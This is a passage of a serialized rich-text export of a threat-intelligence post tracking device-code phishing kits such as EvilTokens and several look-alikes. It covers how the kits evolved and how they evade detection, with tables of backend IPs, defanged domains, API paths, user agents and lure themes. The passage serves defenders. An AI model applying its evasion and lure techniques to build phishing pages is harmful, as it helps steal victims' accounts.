",[],{},{"nodeType":1335,"data":4133,"content":4137},{"target":4134},{"sys":4135},{"id":4136,"type":1340,"linkType":1341},"nJCbTw85GKXdqrlIkzZwi",[],{"nodeType":1307,"data":4139,"content":4140},{},[],{"nodeType":1468,"data":4142,"content":4143},{},[4144],{"nodeType":1257,"value":4145,"marks":4146,"data":4148},"“ANTIBOT” (EvilTokens)",[4147],{"type":1318},{},{"nodeType":1258,"data":4150,"content":4151},{},[4152,4155,4162,4165,4174,4178,4186],{"nodeType":1257,"value":31,"marks":4153,"data":4154},[],{},{"nodeType":1364,"data":4156,"content":4157},{"uri":4090},[4158],{"nodeType":1257,"value":4093,"marks":4159,"data":4161},[4160],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":4163,"data":4164},[],{},{"nodeType":1364,"data":4166,"content":4168},{"uri":4167},"https://blog.sekoia.io/new-widespread-eviltokens-kit-device-code-phishing-as-a-service-part-1/",[4169],{"nodeType":1257,"value":4170,"marks":4171,"data":4173},"Sekoia",[4172],{"type":1372},{},{"nodeType":1257,"value":4175,"marks":4176,"data":4177},", and researcher ",[],{},{"nodeType":1364,"data":4179,"content":4180},{"uri":4077},[4181],{"nodeType":1257,"value":4182,"marks":4183,"data":4185},"Paul Newton",[4184],{"type":1372},{},{"nodeType":1257,"value":4187,"marks":4188,"data":4189}," have already done a great job of providing IOCs for the recent EvilTokens activity spike, including multiple backend Railway IPs in authentication events. ",[],{},{"nodeType":1335,"data":4191,"content":4195},{"target":4192},{"sys":4193},{"id":4194,"type":1340,"linkType":1341},"1XNviq5OvMf5TEAc59F6g5",[],{"nodeType":1258,"data":4197,"content":4198},{},[4199],{"nodeType":1257,"value":4200,"marks":4201,"data":4202},"Beyond the most widely observed implementation featuring a Cloudflare Workers frontend and Railway backend for authentication, we’ve also tracked additional versions of EvilTokens in circulation since January 2026 (many of which remain live along with the current “production” version of the kit). 
",[],{},{"nodeType":1258,"data":4204,"content":4205},{},[4206],{"nodeType":1257,"value":4207,"marks":4208,"data":4209},"You can see an evolution of the kit in the videos and screenshots below, from early precursors seen in mid-January, the first mentions of ANTIBOT in the page code in late-January, the parallel development of a “Courts Access” fork that lacks the ANTIBOT references, and finally production EvilTokens in February. One of the key threads between the versions is the presence of a generateFallbackCode() JS function and use of a /generate-codes API call. ",[],{},{"nodeType":1258,"data":4211,"content":4212},{},[4213],{"nodeType":1257,"value":4214,"marks":4215,"data":4216},"Early implementations were quite different, for example using ScrapingBee to generate the displayed code, and varied hosting on vercel, fastly, edgeone, and others. ",[],{},{"nodeType":1258,"data":4218,"content":4219},{},[4220],{"nodeType":1257,"value":4221,"marks":4222,"data":4223},"After initially appearing on custom domains, the production version is now predominantly hosted on Cloudflare Workers, as per the broader tracking of the campaign. The descriptive HTML comments around ANTIBOT functions have also been removed in later versions. ",[],{},{"nodeType":1258,"data":4225,"content":4226},{},[4227,4231,4238],{"nodeType":1257,"value":4228,"marks":4229,"data":4230},"The production version of EvilTokens showcases common ",[],{},{"nodeType":1364,"data":4232,"content":4233},{"uri":2681},[4234],{"nodeType":1257,"value":2684,"marks":4235,"data":4237},[4236],{"type":1372},{},{"nodeType":1257,"value":4239,"marks":4240,"data":4241}," we've come to associate with PhaaS kits in the AiTM space — using multiple redirects through trusted sites before serving the malicious page, using bot protection to block security tools from analysing the page, and so on. 
It also uses a pop-up window for the device code entry rather than a redirect, reducing the friction for the victim (it looks pretty convincing, too).",[],{},{"nodeType":1335,"data":4243,"content":4247},{"target":4244},{"sys":4245},{"id":4246,"type":1340,"linkType":1341},"73rNOIEDPfP5IJwpFaxVc2",[],{"nodeType":1335,"data":4249,"content":4253},{"target":4250},{"sys":4251},{"id":4252,"type":1340,"linkType":1341},"5BJSvOQUW9UpsQtoDNtgTC",[],{"nodeType":1335,"data":4255,"content":4259},{"target":4256},{"sys":4257},{"id":4258,"type":1340,"linkType":1341},"3dbePPxVb4h4SauGg3glIL",[],{"nodeType":1335,"data":4261,"content":4265},{"target":4262},{"sys":4263},{"id":4264,"type":1340,"linkType":1341},"1UOLcmNQvOsL5tdLSVuviq",[],{"nodeType":1335,"data":4267,"content":4271},{"target":4268},{"sys":4269},{"id":4270,"type":1340,"linkType":1341},"55XRqLSwUUi2D4ZVpJboml",[],{"nodeType":1335,"data":4273,"content":4277},{"target":4274},{"sys":4275},{"id":4276,"type":1340,"linkType":1341},"5wg5yr2Lo8t3f72ZV815c",[],{"nodeType":1335,"data":4279,"content":4283},{"target":4280},{"sys":4281},{"id":4282,"type":1340,"linkType":1341},"35cowlL6i3rkGXOGmSxlI1",[],{"nodeType":1258,"data":4285,"content":4286},{},[4287],{"nodeType":1257,"value":31,"marks":4288,"data":4289},[],{},{"nodeType":4291,"data":4292,"content":4293},"table",{},[4294,4320,4404,4456,4480],{"nodeType":4295,"data":4296,"content":4297},"table-row",{},[4298,4310],{"nodeType":4299,"data":4300,"content":4301},"table-cell",{},[4302],{"nodeType":1258,"data":4303,"content":4304},{},[4305],{"nodeType":1257,"value":4306,"marks":4307,"data":4309},"Frontend infrastructure",[4308],{"type":1318},{},{"nodeType":4299,"data":4311,"content":4312},{},[4313],{"nodeType":1258,"data":4314,"content":4315},{},[4316],{"nodeType":1257,"value":4317,"marks":4318,"data":4319},"Workers.dev, vercel.app, github.io, fastly.net, 
edgeone.dev",[],{},{"nodeType":4295,"data":4321,"content":4322},{},[4323,4334],{"nodeType":4299,"data":4324,"content":4325},{},[4326],{"nodeType":1258,"data":4327,"content":4328},{},[4329],{"nodeType":1257,"value":4330,"marks":4331,"data":4333},"Backend infrastructure",[4332],{"type":1318},{},{"nodeType":4299,"data":4335,"content":4336},{},[4337,4367],{"nodeType":1258,"data":4338,"content":4339},{},[4340,4345,4349,4354,4358,4363],{"nodeType":1257,"value":4341,"marks":4342,"data":4344},"Example IP: (V3) ",[4343],{"type":1318},{},{"nodeType":1257,"value":4346,"marks":4347,"data":4348},"162.220.232.71 (Railway AS400940) ",[],{},{"nodeType":1257,"value":4350,"marks":4351,"data":4353},"(V2)",[4352],{"type":1318},{},{"nodeType":1257,"value":4355,"marks":4356,"data":4357}," 71.11.42.193 ",[],{},{"nodeType":1257,"value":4359,"marks":4360,"data":4362},"(V1) ",[4361],{"type":1318},{},{"nodeType":1257,"value":4364,"marks":4365,"data":4366},"72.218.25.107",[],{},{"nodeType":1258,"data":4368,"content":4369},{},[4370,4375,4379,4384,4388,4392,4396,4400],{"nodeType":1257,"value":4371,"marks":4372,"data":4374},"Backend User Agent:",[4373],{"type":1318},{},{"nodeType":1257,"value":4376,"marks":4377,"data":4378}," ",[],{},{"nodeType":1257,"value":4380,"marks":4381,"data":4383},"(V3) ",[4382],{"type":1318},{},{"nodeType":1257,"value":4385,"marks":4386,"data":4387},"node, ",[],{},{"nodeType":1257,"value":4350,"marks":4389,"data":4391},[4390],{"type":1318},{},{"nodeType":1257,"value":4393,"marks":4394,"data":4395},", Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683 Safari/537.36 OPR/57.0.3098.91 ",[],{},{"nodeType":1257,"value":4359,"marks":4397,"data":4399},[4398],{"type":1318},{},{"nodeType":1257,"value":4401,"marks":4402,"data":4403},"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/56.0.3051.52 
",[],{},{"nodeType":4295,"data":4405,"content":4406},{},[4407,4418],{"nodeType":4299,"data":4408,"content":4409},{},[4410],{"nodeType":1258,"data":4411,"content":4412},{},[4413],{"nodeType":1257,"value":4414,"marks":4415,"data":4417},"Network paths",[4416],{"type":1318},{},{"nodeType":4299,"data":4419,"content":4420},{},[4421,4428,4435,4442,4449],{"nodeType":1258,"data":4422,"content":4423},{},[4424],{"nodeType":1257,"value":4425,"marks":4426,"data":4427},"/api/rate-limit ",[],{},{"nodeType":1258,"data":4429,"content":4430},{},[4431],{"nodeType":1257,"value":4432,"marks":4433,"data":4434},"/api/fingerprint ",[],{},{"nodeType":1258,"data":4436,"content":4437},{},[4438],{"nodeType":1257,"value":4439,"marks":4440,"data":4441},"/api/captcha-verify ",[],{},{"nodeType":1258,"data":4443,"content":4444},{},[4445],{"nodeType":1257,"value":4446,"marks":4447,"data":4448},"/api/init /api/generate-code ",[],{},{"nodeType":1258,"data":4450,"content":4451},{},[4452],{"nodeType":1257,"value":4453,"marks":4454,"data":4455},"/api/check-auth",[],{},{"nodeType":4295,"data":4457,"content":4458},{},[4459,4470],{"nodeType":4299,"data":4460,"content":4461},{},[4462],{"nodeType":1258,"data":4463,"content":4464},{},[4465],{"nodeType":1257,"value":4466,"marks":4467,"data":4469},"Lure themes",[4468],{"type":1318},{},{"nodeType":4299,"data":4471,"content":4472},{},[4473],{"nodeType":1258,"data":4474,"content":4475},{},[4476],{"nodeType":1257,"value":4477,"marks":4478,"data":4479},"Various MS lures (e.g. 
Outlook, SharePoint, Teams) DocuSign, Adobe",[],{},{"nodeType":4295,"data":4481,"content":4482},{},[4483,4494],{"nodeType":4299,"data":4484,"content":4485},{},[4486],{"nodeType":1258,"data":4487,"content":4488},{},[4489],{"nodeType":1257,"value":4490,"marks":4491,"data":4493},"Example Domain",[4492],{"type":1318},{},{"nodeType":4299,"data":4495,"content":4496},{},[4497,4509,4521,4533,4545],{"nodeType":1258,"data":4498,"content":4499},{},[4500,4505],{"nodeType":1257,"value":4501,"marks":4502,"data":4504},"Precursor A:",[4503],{"type":1318},{},{"nodeType":1257,"value":4506,"marks":4507,"data":4508}," teams-zpfvwnpxuc[.]edgeone.dev",[],{},{"nodeType":1258,"data":4510,"content":4511},{},[4512,4517],{"nodeType":1257,"value":4513,"marks":4514,"data":4516},"Precursor B: ",[4515],{"type":1318},{},{"nodeType":1257,"value":4518,"marks":4519,"data":4520},"authenticate-m365-accountsecurity-m-pi[.]vercel.app",[],{},{"nodeType":1258,"data":4522,"content":4523},{},[4524,4529],{"nodeType":1257,"value":4525,"marks":4526,"data":4528},"Courts Access: ",[4527],{"type":1318},{},{"nodeType":1257,"value":4530,"marks":4531,"data":4532},"secure-systems-validations-courts[.]vercel.app",[],{},{"nodeType":1258,"data":4534,"content":4535},{},[4536,4541],{"nodeType":1257,"value":4537,"marks":4538,"data":4540},"Early ANTIBOT:",[4539],{"type":1318},{},{"nodeType":1257,"value":4542,"marks":4543,"data":4544}," interface-auth-en-useast[.]global.ssl.fastly.net",[],{},{"nodeType":1258,"data":4546,"content":4547},{},[4548,4553],{"nodeType":1257,"value":4549,"marks":4550,"data":4552},"Production ANTIBOT: 
",[4551],{"type":1318},{},{"nodeType":1257,"value":4554,"marks":4555,"data":4556},"index-z059-document-pending-reviewsign-xlss7994824[.]awalizer[.]workers.dev",[],{},{"nodeType":1307,"data":4558,"content":4559},{},[],{"nodeType":1468,"data":4561,"content":4562},{},[4563],{"nodeType":1257,"value":4564,"marks":4565,"data":4567},"“SHAREFILE”",[4566],{"type":1318},{},{"nodeType":4291,"data":4569,"content":4570},{},[4571,4594,4633,4656,4679],{"nodeType":4295,"data":4572,"content":4573},{},[4574,4584],{"nodeType":4299,"data":4575,"content":4576},{},[4577],{"nodeType":1258,"data":4578,"content":4579},{},[4580],{"nodeType":1257,"value":4306,"marks":4581,"data":4583},[4582],{"type":1318},{},{"nodeType":4299,"data":4585,"content":4586},{},[4587],{"nodeType":1258,"data":4588,"content":4589},{},[4590],{"nodeType":1257,"value":4591,"marks":4592,"data":4593},"No hosting markers visible.",[],{},{"nodeType":4295,"data":4595,"content":4596},{},[4597,4607],{"nodeType":4299,"data":4598,"content":4599},{},[4600],{"nodeType":1258,"data":4601,"content":4602},{},[4603],{"nodeType":1257,"value":4330,"marks":4604,"data":4606},[4605],{"type":1318},{},{"nodeType":4299,"data":4608,"content":4609},{},[4610,4622],{"nodeType":1258,"data":4611,"content":4612},{},[4613,4618],{"nodeType":1257,"value":4614,"marks":4615,"data":4617},"Example IP:",[4616],{"type":1318},{},{"nodeType":1257,"value":4619,"marks":4620,"data":4621}," 147.45.60.47 (Global Connectivity Solutions LLP AS215540)",[],{},{"nodeType":1258,"data":4623,"content":4624},{},[4625,4629],{"nodeType":1257,"value":4371,"marks":4626,"data":4628},[4627],{"type":1318},{},{"nodeType":1257,"value":4630,"marks":4631,"data":4632}," 
node",[],{},{"nodeType":4295,"data":4634,"content":4635},{},[4636,4646],{"nodeType":4299,"data":4637,"content":4638},{},[4639],{"nodeType":1258,"data":4640,"content":4641},{},[4642],{"nodeType":1257,"value":4414,"marks":4643,"data":4645},[4644],{"type":1318},{},{"nodeType":4299,"data":4647,"content":4648},{},[4649],{"nodeType":1258,"data":4650,"content":4651},{},[4652],{"nodeType":1257,"value":4653,"marks":4654,"data":4655},"POST /api/device/start  POST /api/device/poll",[],{},{"nodeType":4295,"data":4657,"content":4658},{},[4659,4669],{"nodeType":4299,"data":4660,"content":4661},{},[4662],{"nodeType":1258,"data":4663,"content":4664},{},[4665],{"nodeType":1257,"value":4466,"marks":4666,"data":4668},[4667],{"type":1318},{},{"nodeType":4299,"data":4670,"content":4671},{},[4672],{"nodeType":1258,"data":4673,"content":4674},{},[4675],{"nodeType":1257,"value":4676,"marks":4677,"data":4678},"Citrix ShareFile document transfer — file card with sender info, expiry warning, download/preview buttons",[],{},{"nodeType":4295,"data":4680,"content":4681},{},[4682,4693],{"nodeType":4299,"data":4683,"content":4684},{},[4685],{"nodeType":1258,"data":4686,"content":4687},{},[4688],{"nodeType":1257,"value":4689,"marks":4690,"data":4692},"Example 
domain",[4691],{"type":1318},{},{"nodeType":4299,"data":4694,"content":4695},{},[4696],{"nodeType":1258,"data":4697,"content":4698},{},[4699],{"nodeType":1257,"value":4700,"marks":4701,"data":4702},"cghdfg[.]vbchkioi[.]su",[],{},{"nodeType":1335,"data":4704,"content":4708},{"target":4705},{"sys":4706},{"id":4707,"type":1340,"linkType":1341},"1TtZ6VsMSTlPvy7W996w9E",[],{"nodeType":1307,"data":4710,"content":4711},{},[],{"nodeType":1468,"data":4713,"content":4714},{},[4715],{"nodeType":1257,"value":4716,"marks":4717,"data":4719},"“CLURE”",[4718],{"type":1318},{},{"nodeType":4291,"data":4721,"content":4722},{},[4723,4746,4785,4808,4831],{"nodeType":4295,"data":4724,"content":4725},{},[4726,4736],{"nodeType":4299,"data":4727,"content":4728},{},[4729],{"nodeType":1258,"data":4730,"content":4731},{},[4732],{"nodeType":1257,"value":4306,"marks":4733,"data":4735},[4734],{"type":1318},{},{"nodeType":4299,"data":4737,"content":4738},{},[4739],{"nodeType":1258,"data":4740,"content":4741},{},[4742],{"nodeType":1257,"value":4743,"marks":4744,"data":4745},"API on api[.]duemineral[.]uk:8443 and api[.]loadingdocuments[.]uk:8443 (rotates). 
",[],{},{"nodeType":4295,"data":4747,"content":4748},{},[4749,4759],{"nodeType":4299,"data":4750,"content":4751},{},[4752],{"nodeType":1258,"data":4753,"content":4754},{},[4755],{"nodeType":1257,"value":4330,"marks":4756,"data":4758},[4757],{"type":1318},{},{"nodeType":4299,"data":4760,"content":4761},{},[4762,4774],{"nodeType":1258,"data":4763,"content":4764},{},[4765,4770],{"nodeType":1257,"value":4766,"marks":4767,"data":4769},"Example IP: ",[4768],{"type":1318},{},{"nodeType":1257,"value":4771,"marks":4772,"data":4773},"162.243.166.119 (DigitalOcean AS14061)",[],{},{"nodeType":1258,"data":4775,"content":4776},{},[4777,4781],{"nodeType":1257,"value":4371,"marks":4778,"data":4780},[4779],{"type":1318},{},{"nodeType":1257,"value":4782,"marks":4783,"data":4784}," python-requests/2.32.5",[],{},{"nodeType":4295,"data":4786,"content":4787},{},[4788,4798],{"nodeType":4299,"data":4789,"content":4790},{},[4791],{"nodeType":1258,"data":4792,"content":4793},{},[4794],{"nodeType":1257,"value":4414,"marks":4795,"data":4797},[4796],{"type":1318},{},{"nodeType":4299,"data":4799,"content":4800},{},[4801],{"nodeType":1258,"data":4802,"content":4803},{},[4804],{"nodeType":1257,"value":4805,"marks":4806,"data":4807},"GET /api/status/{numeric_SID} (port :8443)",[],{},{"nodeType":4295,"data":4809,"content":4810},{},[4811,4821],{"nodeType":4299,"data":4812,"content":4813},{},[4814],{"nodeType":1258,"data":4815,"content":4816},{},[4817],{"nodeType":1257,"value":4466,"marks":4818,"data":4820},[4819],{"type":1318},{},{"nodeType":4299,"data":4822,"content":4823},{},[4824],{"nodeType":1258,"data":4825,"content":4826},{},[4827],{"nodeType":1257,"value":4828,"marks":4829,"data":4830},"SharePoint \"Team Site\" doc library, SharePoint \"Shared Document\" individual 
share",[],{},{"nodeType":4295,"data":4832,"content":4833},{},[4834,4844],{"nodeType":4299,"data":4835,"content":4836},{},[4837],{"nodeType":1258,"data":4838,"content":4839},{},[4840],{"nodeType":1257,"value":4689,"marks":4841,"data":4843},[4842],{"type":1318},{},{"nodeType":4299,"data":4845,"content":4846},{},[4847],{"nodeType":1258,"data":4848,"content":4849},{},[4850],{"nodeType":1257,"value":4851,"marks":4852,"data":4853},"auth[.]duemineral[.]uk",[],{},{"nodeType":1335,"data":4855,"content":4859},{"target":4856},{"sys":4857},{"id":4858,"type":1340,"linkType":1341},"3DAm11OYudNrqbL6pda5S1",[],{"nodeType":1307,"data":4861,"content":4862},{},[],{"nodeType":1468,"data":4864,"content":4865},{},[4866],{"nodeType":1257,"value":4867,"marks":4868,"data":4870},"“LINKID”",[4869],{"type":1318},{},{"nodeType":4291,"data":4872,"content":4873},{},[4874,4897,4942,4972,4995],{"nodeType":4295,"data":4875,"content":4876},{},[4877,4887],{"nodeType":4299,"data":4878,"content":4879},{},[4880],{"nodeType":1258,"data":4881,"content":4882},{},[4883],{"nodeType":1257,"value":4306,"marks":4884,"data":4886},[4885],{"type":1318},{},{"nodeType":4299,"data":4888,"content":4889},{},[4890],{"nodeType":1258,"data":4891,"content":4892},{},[4893],{"nodeType":1257,"value":4894,"marks":4895,"data":4896},"Adobe variant has Cloudflare challenge-platform iframe (CF-protected origin). 
Relative API paths — self-hosted.",[],{},{"nodeType":4295,"data":4898,"content":4899},{},[4900,4910],{"nodeType":4299,"data":4901,"content":4902},{},[4903],{"nodeType":1258,"data":4904,"content":4905},{},[4906],{"nodeType":1257,"value":4330,"marks":4907,"data":4909},[4908],{"type":1318},{},{"nodeType":4299,"data":4911,"content":4912},{},[4913,4924,4931],{"nodeType":1258,"data":4914,"content":4915},{},[4916,4920],{"nodeType":1257,"value":4766,"marks":4917,"data":4919},[4918],{"type":1318},{},{"nodeType":1257,"value":4921,"marks":4922,"data":4923},"185.176.220.22 (2cloud.eu AS39845)",[],{},{"nodeType":1258,"data":4925,"content":4926},{},[4927],{"nodeType":1257,"value":4928,"marks":4929,"data":4930},"2600:1f10:470d:9a00:1437:ec30:be61:3494 (AWS AS16509)",[],{},{"nodeType":1258,"data":4932,"content":4933},{},[4934,4938],{"nodeType":1257,"value":4371,"marks":4935,"data":4937},[4936],{"type":1318},{},{"nodeType":1257,"value":4939,"marks":4940,"data":4941}," axios/1.10.0 , axios/1.13.6",[],{},{"nodeType":4295,"data":4943,"content":4944},{},[4945,4955],{"nodeType":4299,"data":4946,"content":4947},{},[4948],{"nodeType":1258,"data":4949,"content":4950},{},[4951],{"nodeType":1257,"value":4414,"marks":4952,"data":4954},[4953],{"type":1318},{},{"nodeType":4299,"data":4956,"content":4957},{},[4958,4965],{"nodeType":1258,"data":4959,"content":4960},{},[4961],{"nodeType":1257,"value":4962,"marks":4963,"data":4964},"POST /api/device/start",[],{},{"nodeType":1258,"data":4966,"content":4967},{},[4968],{"nodeType":1257,"value":4969,"marks":4970,"data":4971},"GET 
/api/device/status/{sessionId}",[],{},{"nodeType":4295,"data":4973,"content":4974},{},[4975,4985],{"nodeType":4299,"data":4976,"content":4977},{},[4978],{"nodeType":1258,"data":4979,"content":4980},{},[4981],{"nodeType":1257,"value":4466,"marks":4982,"data":4984},[4983],{"type":1318},{},{"nodeType":4299,"data":4986,"content":4987},{},[4988],{"nodeType":1258,"data":4989,"content":4990},{},[4991],{"nodeType":1257,"value":4992,"marks":4993,"data":4994},"MS Teams meeting invitation (with interactive date/time picker), Adobe Acrobat Sign document review",[],{},{"nodeType":4295,"data":4996,"content":4997},{},[4998,5008],{"nodeType":4299,"data":4999,"content":5000},{},[5001],{"nodeType":1258,"data":5002,"content":5003},{},[5004],{"nodeType":1257,"value":4689,"marks":5005,"data":5007},[5006],{"type":1318},{},{"nodeType":4299,"data":5009,"content":5010},{},[5011],{"nodeType":1258,"data":5012,"content":5013},{},[5014],{"nodeType":1257,"value":5015,"marks":5016,"data":5017},"sdtr-site[.]cfd",[],{},{"nodeType":1335,"data":5019,"content":5023},{"target":5020},{"sys":5021},{"id":5022,"type":1340,"linkType":1341},"22hsIzlkptC2JTIUtbOuUn",[],{"nodeType":1307,"data":5025,"content":5026},{},[],{"nodeType":1468,"data":5028,"content":5029},{},[5030],{"nodeType":1257,"value":5031,"marks":5032,"data":5034},"“AUTHOV”",[5033],{"type":1318},{},{"nodeType":4291,"data":5036,"content":5037},{},[5038,5061,5107,5130,5153],{"nodeType":4295,"data":5039,"content":5040},{},[5041,5051],{"nodeType":4299,"data":5042,"content":5043},{},[5044],{"nodeType":1258,"data":5045,"content":5046},{},[5047],{"nodeType":1257,"value":4306,"marks":5048,"data":5050},[5049],{"type":1318},{},{"nodeType":4299,"data":5052,"content":5053},{},[5054],{"nodeType":1258,"data":5055,"content":5056},{},[5057],{"nodeType":1257,"value":5058,"marks":5059,"data":5060},"workers.dev",[],{},{"nodeType":4295,"data":5062,"content":5063},{},[5064,5074],{"nodeType":4299,"data":5065,"content":5066},{},[5067],{"nodeType":1258,"data":5068,"con
tent":5069},{},[5070],{"nodeType":1257,"value":4330,"marks":5071,"data":5073},[5072],{"type":1318},{},{"nodeType":4299,"data":5075,"content":5076},{},[5077,5088],{"nodeType":1258,"data":5078,"content":5079},{},[5080,5084],{"nodeType":1257,"value":4766,"marks":5081,"data":5083},[5082],{"type":1318},{},{"nodeType":1257,"value":5085,"marks":5086,"data":5087},"192.3.225.100 (HostPapa / ColoCrossing AS36352)",[],{},{"nodeType":1258,"data":5089,"content":5090},{},[5091,5095,5098,5103],{"nodeType":1257,"value":4371,"marks":5092,"data":5094},[5093],{"type":1318},{},{"nodeType":1257,"value":4376,"marks":5096,"data":5097},[],{},{"nodeType":1257,"value":5099,"marks":5100,"data":5102}," ",[5101],{"type":1318},{},{"nodeType":1257,"value":5104,"marks":5105,"data":5106},"python-httpx/0.28.1",[],{},{"nodeType":4295,"data":5108,"content":5109},{},[5110,5120],{"nodeType":4299,"data":5111,"content":5112},{},[5113],{"nodeType":1258,"data":5114,"content":5115},{},[5116],{"nodeType":1257,"value":4414,"marks":5117,"data":5119},[5118],{"type":1318},{},{"nodeType":4299,"data":5121,"content":5122},{},[5123],{"nodeType":1258,"data":5124,"content":5125},{},[5126],{"nodeType":1257,"value":5127,"marks":5128,"data":5129},"GET /landing/api/session-status?session_id=&token=",[],{},{"nodeType":4295,"data":5131,"content":5132},{},[5133,5143],{"nodeType":4299,"data":5134,"content":5135},{},[5136],{"nodeType":1258,"data":5137,"content":5138},{},[5139],{"nodeType":1257,"value":4466,"marks":5140,"data":5142},[5141],{"type":1318},{},{"nodeType":4299,"data":5144,"content":5145},{},[5146],{"nodeType":1258,"data":5147,"content":5148},{},[5149],{"nodeType":1257,"value":5150,"marks":5151,"data":5152},"Adobe Acrobat document sharing (PDF preview, sender 
avatar)",[],{},{"nodeType":4295,"data":5154,"content":5155},{},[5156,5166],{"nodeType":4299,"data":5157,"content":5158},{},[5159],{"nodeType":1258,"data":5160,"content":5161},{},[5162],{"nodeType":1257,"value":4689,"marks":5163,"data":5165},[5164],{"type":1318},{},{"nodeType":4299,"data":5167,"content":5168},{},[5169],{"nodeType":1258,"data":5170,"content":5171},{},[5172],{"nodeType":1257,"value":5173,"marks":5174,"data":5175},"milosh-solibella-0dcio[.]sgttommy.workers.dev",[],{},{"nodeType":1335,"data":5177,"content":5181},{"target":5178},{"sys":5179},{"id":5180,"type":1340,"linkType":1341},"6szO6IKJ32usyxIKX1efZy",[],{"nodeType":1307,"data":5183,"content":5184},{},[],{"nodeType":1468,"data":5186,"content":5187},{},[5188],{"nodeType":1257,"value":5189,"marks":5190,"data":5192},"“DOCUPOLL”",[5191],{"type":1318},{},{"nodeType":4291,"data":5194,"content":5195},{},[5196,5219,5257,5294,5317],{"nodeType":4295,"data":5197,"content":5198},{},[5199,5209],{"nodeType":4299,"data":5200,"content":5201},{},[5202],{"nodeType":1258,"data":5203,"content":5204},{},[5205],{"nodeType":1257,"value":4306,"marks":5206,"data":5208},[5207],{"type":1318},{},{"nodeType":4299,"data":5210,"content":5211},{},[5212],{"nodeType":1258,"data":5213,"content":5214},{},[5215],{"nodeType":1257,"value":5216,"marks":5217,"data":5218},"Github.io and workers.dev hosting",[],{},{"nodeType":4295,"data":5220,"content":5221},{},[5222,5232],{"nodeType":4299,"data":5223,"content":5224},{},[5225],{"nodeType":1258,"data":5226,"content":5227},{},[5228],{"nodeType":1257,"value":4330,"marks":5229,"data":5231},[5230],{"type":1318},{},{"nodeType":4299,"data":5233,"content":5234},{},[5235,5246],{"nodeType":1258,"data":5236,"content":5237},{},[5238,5242],{"nodeType":1257,"value":4766,"marks":5239,"data":5241},[5240],{"type":1318},{},{"nodeType":1257,"value":5243,"marks":5244,"data":5245},"144.172.103.240 (FranTech Solutions / RouterHosting / Cloudzy 
AS14956)",[],{},{"nodeType":1258,"data":5247,"content":5248},{},[5249,5253],{"nodeType":1257,"value":4371,"marks":5250,"data":5252},[5251],{"type":1318},{},{"nodeType":1257,"value":5254,"marks":5255,"data":5256}," Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19042",[],{},{"nodeType":4295,"data":5258,"content":5259},{},[5260,5270],{"nodeType":4299,"data":5261,"content":5262},{},[5263],{"nodeType":1258,"data":5264,"content":5265},{},[5266],{"nodeType":1257,"value":4414,"marks":5267,"data":5269},[5268],{"type":1318},{},{"nodeType":4299,"data":5271,"content":5272},{},[5273,5280,5287],{"nodeType":1258,"data":5274,"content":5275},{},[5276],{"nodeType":1257,"value":5277,"marks":5278,"data":5279},"POST /api/v1/landing-pages/public/{slug}/init",[],{},{"nodeType":1258,"data":5281,"content":5282},{},[5283],{"nodeType":1257,"value":5284,"marks":5285,"data":5286},"POST .../poll",[],{},{"nodeType":1258,"data":5288,"content":5289},{},[5290],{"nodeType":1257,"value":5291,"marks":5292,"data":5293},"POST .../track",[],{},{"nodeType":4295,"data":5295,"content":5296},{},[5297,5307],{"nodeType":4299,"data":5298,"content":5299},{},[5300],{"nodeType":1258,"data":5301,"content":5302},{},[5303],{"nodeType":1257,"value":4466,"marks":5304,"data":5306},[5305],{"type":1318},{},{"nodeType":4299,"data":5308,"content":5309},{},[5310],{"nodeType":1258,"data":5311,"content":5312},{},[5313],{"nodeType":1257,"value":5314,"marks":5315,"data":5316},"DocuSign document signing. 
One sample is a full scrape of real docusign.com (free-account page) with kit injected.",[],{},{"nodeType":4295,"data":5318,"content":5319},{},[5320,5330],{"nodeType":4299,"data":5321,"content":5322},{},[5323],{"nodeType":1258,"data":5324,"content":5325},{},[5326],{"nodeType":1257,"value":4689,"marks":5327,"data":5329},[5328],{"type":1318},{},{"nodeType":4299,"data":5331,"content":5332},{},[5333],{"nodeType":1258,"data":5334,"content":5335},{},[5336],{"nodeType":1257,"value":5337,"marks":5338,"data":5339},"docufirmar[.]github.io",[],{},{"nodeType":1335,"data":5341,"content":5345},{"target":5342},{"sys":5343},{"id":5344,"type":1340,"linkType":1341},"6Y1XABHnQD82R3MW80HnQZ",[],{"nodeType":1307,"data":5347,"content":5348},{},[],{"nodeType":1468,"data":5350,"content":5351},{},[5352],{"nodeType":1257,"value":5353,"marks":5354,"data":5356},"“FLOW_TOKEN”",[5355],{"type":1318},{},{"nodeType":4291,"data":5358,"content":5359},{},[5360,5382,5427,5457,5480],{"nodeType":4295,"data":5361,"content":5362},{},[5363,5373],{"nodeType":4299,"data":5364,"content":5365},{},[5366],{"nodeType":1258,"data":5367,"content":5368},{},[5369],{"nodeType":1257,"value":4306,"marks":5370,"data":5372},[5371],{"type":1318},{},{"nodeType":4299,"data":5374,"content":5375},{},[5376],{"nodeType":1258,"data":5377,"content":5378},{},[5379],{"nodeType":1257,"value":5058,"marks":5380,"data":5381},[],{},{"nodeType":4295,"data":5383,"content":5384},{},[5385,5395],{"nodeType":4299,"data":5386,"content":5387},{},[5388],{"nodeType":1258,"data":5389,"content":5390},{},[5391],{"nodeType":1257,"value":4330,"marks":5392,"data":5394},[5393],{"type":1318},{},{"nodeType":4299,"data":5396,"content":5397},{},[5398,5409],{"nodeType":1258,"data":5399,"content":5400},{},[5401,5405],{"nodeType":1257,"value":4766,"marks":5402,"data":5404},[5403],{"type":1318},{},{"nodeType":1257,"value":5406,"marks":5407,"data":5408},"43.166.163.163 (Tencent Cloud 
